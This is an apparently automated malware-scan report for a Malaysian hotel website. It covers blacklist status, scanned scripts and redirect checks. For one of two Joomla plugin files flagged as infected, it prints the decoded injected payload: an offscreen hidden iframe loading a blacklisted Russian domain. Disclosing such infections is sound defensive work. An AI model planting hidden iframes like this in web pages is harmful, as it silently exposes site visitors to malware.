Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bukitmertajamhotel.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bukitmertajamhotel.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bukitmertajamhotel.com/ | 200 OK Content-Length: 23150 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/modules/mod_jvslideshow/assets/js/jd.gallery.js | 200 OK Content-Length: 27114 Content-Type: application/javascript | clean |
http://bukitmertajamhotel.com/modules/mod_jvslideshow/assets/js/jd.gallery.transitions.js | 200 OK Content-Length: 5818 Content-Type: application/javascript | clean |
http://bukitmertajamhotel.com/templates/jv_winto/jv_menus/jv_moomenu/jv.moomenu.js | 200 OK Content-Length: 4619 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var subnav = new Array(); Element.extend( { doActive: function () { this.className+=' hover'; }, doDeactive: function () { this.className=this.className.replace(new RegExp("hover\\b"), ""); }, hide: function(timeout) { this.status = 'hide'; clearTimeout (this.timeout); if (timeout) { this.timeout = setTimeout (this.animation.bind(this), timeout); }else{ this.animation(); } }, Antivirus reports:
| ||
http://bukitmertajamhotel.com/templates/jv_winto/js/jv.script.js | 200 OK Content-Length: 6473 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21219 Content-Type: text/javascript | clean |
http://ajaxsearch.partners.agoda.com/partners/SearchBox/Scripts/Agoda.SearchBoxV2.js | 200 OK Content-Length: 20444 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 167017 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 99120 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3711 Content-Type: text/javascript | clean |
http://bukitmertajamhotel.com/how-to-go.html | 200 OK Content-Length: 26115 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/Penang-Hotels/b-suite-hotel-penang.html | 200 OK Content-Length: 19709 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/plugins/content/extravote/extravote.js | 200 OK Content-Length: 3914 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: jqueryjsscript.ru function JVXVote(id,i,total,total_count,xid,counter){ var currentURL = window.location; var live_site = currentURL.protocol+'//'+currentURL.host+sfolder; var lsXmlHttp = ''; var div = document.getElementById('extravote_'+id+'_'+xid); if (div.className != 'extravote-count voted') { div.innerHTML='<img src="'+live_site+'/plugins/content/extravote/loading.gif" border="0" align="absmiddle" /> '+'<sm ...[3748 bytes skipped]... Decoded script: <div style="position:absolute; top:-508px;"><iframe src="http://jqueryjsscript.ru/"></iframe></div> | ||
http://bukitmertajamhotel.com/Penang-Hotels/berjaya-penang-hotel.html | 200 OK Content-Length: 19733 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/Penang-Hotels/1926-heritage-hotel.html | 200 OK Content-Length: 19722 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 10:41:03 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 10:41:04 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 720815e97ed86ff74b903abba008a61f=092f6c2c8b834a9cae9825d1bb02a476; path=/
Set-Cookie: jv_winto_tpl=jv_winto; expires=Wed, 17-Jun-2015 10:41:04 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 10:41:03 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 10:41:04 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 720815e97ed86ff74b903abba008a61f=092f6c2c8b834a9cae9825d1bb02a476; path=/
Set-Cookie: jv_winto_tpl=jv_winto; expires=Wed, 17-Jun-2015 10:41:04 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Referer: http://www.google.com/search?q=bukitmertajamhotel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Referer: http://www.google.com/search?q=bukitmertajamhotel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.